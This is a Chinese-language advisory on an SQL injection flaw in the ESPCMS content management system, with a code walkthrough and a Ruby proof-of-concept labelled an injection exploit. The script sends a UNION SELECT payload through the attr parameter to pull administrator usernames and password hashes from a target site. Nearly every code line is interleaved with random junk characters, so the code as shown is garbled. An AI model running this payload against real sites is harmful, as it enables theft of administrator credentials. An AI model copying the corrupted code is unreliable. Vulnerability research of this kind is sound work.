0×0 漏洞概述
0×1 漏洞细节
0×2 PoC

0×0 漏洞概述

易思ESPCMS企业网站管理系统是基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便等特点,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
其在处理传入的参数时考虑不严谨,导致了SQL注入的发生。

0×1 漏洞细节
变量的传递过程是 $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query,整个过程没有任何过滤,导致了注入的发生。
正因为变量是从$_SERVER['QUERY_STRING']中直接取的,所以正好避开了程序的过滤。
而注入的变量是数组的值,并非数组的key(从下面的代码可以看到,$key经过了addslashes和inputcodetrim处理,而$value则未经任何处理就被拼接进了$db_where),所以也没有被过滤,综合起来形成了一个比较少见的SQL注入。

在/interface/3gwap_search.php文件的in_result函数中:

7 C; V; S4 \9 g" v2 o: l function in_result() {
+ d2 o4 ` P7 m# _: H1 e$ ] ... ... ... ... ... ... ... ... ...
C* b" F, A/ i9 P$ e" v $urlcode = $_SERVER[ 'QUERY_STRING '];9 P' T( e6 |8 g+ r: x' I
parse_str(html_entity_decode($urlcode), $output);
2 v+ M' W/ k5 s) t' G4 @; u! ~) Q( A7 B9 n9 I
... ... ... ... ... ... ... ... ...- R1 l/ h9 q* k7 U! H
if (is_array($output['attr' ]) && count($output['attr']) > 0) {/ t, V) Z9 D0 t
) ^9 h; S3 b' k $db_table = db_prefix . 'model_att';
$ F4 J/ j/ @ B5 r9 J. ~; k, u- _8 T; T; \6 X# i
foreach ($output['attr' ] as $key => $value) {
- ]) Z/ L$ i R if ($value) {
7 C' y2 }8 J9 D4 U X5 V2 M' R0 `2 r$ Y4 N& ?* Q# W4 a# g( x
$key = addslashes($key);
4 u/ o* s5 [/ a $key = $this-> fun->inputcodetrim($key);
! G! o+ ^. ?) ^/ n $db_att_where = " WHERE isclass=1 AND attrname='$key'";
/ F6 u! i4 c- d* L V3 o, s $countnum = $this->db_numrows($db_table, $db_att_where);
/ ~7 w/ H# v9 f- j9 p if ($countnum > 0) {
3 o) H. x' h* B! _ $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;/ n- K) h6 ?! L9 R2 l& E: i* c
}
' Z6 P4 J# M, g. n b }
3 @# ~* i* e* R* u; X1 b4 j }$ s- }, \1 n) k6 l/ j' x6 r: ^
}8 }2 c3 p. U& D1 X( r/ O5 O1 l
if (!empty ($keyword) && empty($keyname)) {
% J) \7 d4 ?/ |$ w$ [ _. j+ R! A $keyname = 'title';" N( u# m5 m# I) c9 i& ^+ e
$db_where.= " AND a.title like '%$keyword%'" ; V3 l& L+ E. [* G
} elseif (!empty ($keyword) && !empty($keyname)) {) W' F: V: r3 w
$db_where.= " AND $keyname like '% $keyword%'";
2 h8 v7 n- Y+ j$ P }
1 a G; s( F- f; `3 x7 B $pagemax = 15;
9 G. W3 f2 P3 E: H) L5 ]3 y3 N: n* N3 ~3 R, k! {
$pagesylte = 1;4 d; ]; r3 O$ G+ n) h
9 i, q. u" G/ Y6 [7 G( i& z if ($countnum > 0) {
p( f2 Z: T, Z7 i8 u8 |6 h& k4 U ~1 @4 _7 t
$numpage = ceil($countnum / $pagemax);
! d/ _* k/ V" i2 l" e } else {" [$ C2 Z% K) T
$numpage = 1;
/ x4 @ c6 a7 `/ \& ]0 [4 g$ N }
( w4 g6 h \# c* D2 r" ` $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
4 A+ T' s8 n' E$ j $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);# [ ] J# k+ v0 Q+ {
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
: c+ J. U/ Z% b- y2 e: I. G ... ... ... ... ... ... ... ... ...' W# y7 U" ^) }5 v
}

0×2 PoC

2 p3 K, Z6 j5 d) v y1 Srequire "net/http"; f" B1 X6 T, `! f5 M* i& |
- Q: K4 E- _3 c0 y6 _5 }! [def request(method, url)
( D4 ]' U9 b' T8 s, d if method.eql?("get")
& D3 d# g6 x s uri = URI.parse(url)3 _" V% `4 r+ w" W4 B! I8 A" y
http = Net::HTTP.new(uri.host, uri.port)
; k7 c- b0 z" T- J: N6 X response = http.request(Net::HTTP::Get.new(uri.request_uri))% o$ d8 T: @: P
return response5 @3 z# r" p2 |/ d/ L9 C4 o
end
& `% \0 i" o# ~$ [/ pend# l* s0 S1 H, {% r
# k! T, M$ F/ K1 Qdoc =<<HERE7 h% B' z* O& Y, F8 g
-------------------------------------------------------& y$ ^4 v: ^6 ?
Espcms Injection Exploit
% ~. e6 v+ d% l2 C. v, ` _0 vAuthor:ztz* a% x3 P9 e U, O% @
Blog:http://ztz.fuzzexp.org/
J8 y1 z6 L! d/ B9 I-------------------------------------------------------
; f, s) O, K7 k( f2 R( t
0 Z p7 n# b, }% A. qHERE' V& V' g. y _ c2 {% F5 _0 [
7 p4 R9 K4 g9 ?6 N) r; r
usage =<<HERE6 T! s [9 P* a8 M" {
Usage: ruby #{$0} host port path4 \9 Z6 a D3 r3 w' k' S
example: ruby #{$0} www.target.com 80 /0 R6 \, n4 J' _: B; [6 `
HERE4 S; g2 i8 g: Q1 M+ ^
$ B9 v- u1 {) b3 z# s7 P' e
puts doc
" O! G" E. W3 b; t6 _1 b8 hif ARGV.length < 3% F2 O H3 J' G4 {, f
puts usage
( s, y1 H- K( {8 ielse
- c* `4 Q, d8 J1 u# c8 k $host = ARGV[0]4 k7 W# V% b* M1 c/ S$ B! r7 ^
$port = ARGV[1]
1 z5 J5 K$ n3 U$ l; H% \3 v$ e $path = ARGV[2]& C2 v9 Y# P3 C1 a% ^# a' R
9 N# F }& ?. b- [
puts "send request..."
4 j [* k m; F8 r5 |; d% I url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
) N# o; ^$ p1 H$ ]: H! f+ y0 Tattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
( i4 Z$ O; m* U6 F5 V2 g0 z,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27. g! V1 X; e5 w! t
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"; ]! q" Y+ k+ |/ F% R i
response = request("get", url)
7 C0 K! ^4 P0 @, {; m4 w0 Y result = response.body.scan(/\w+&\w{32}/)
8 T& B" M4 i. p. M/ ~" Q puts result
/ K' {" J+ ~4 C4 R# }end6 | y V6 N6 l* I# N
) h( J4 O+ [, n/ Y6 v" _1 y |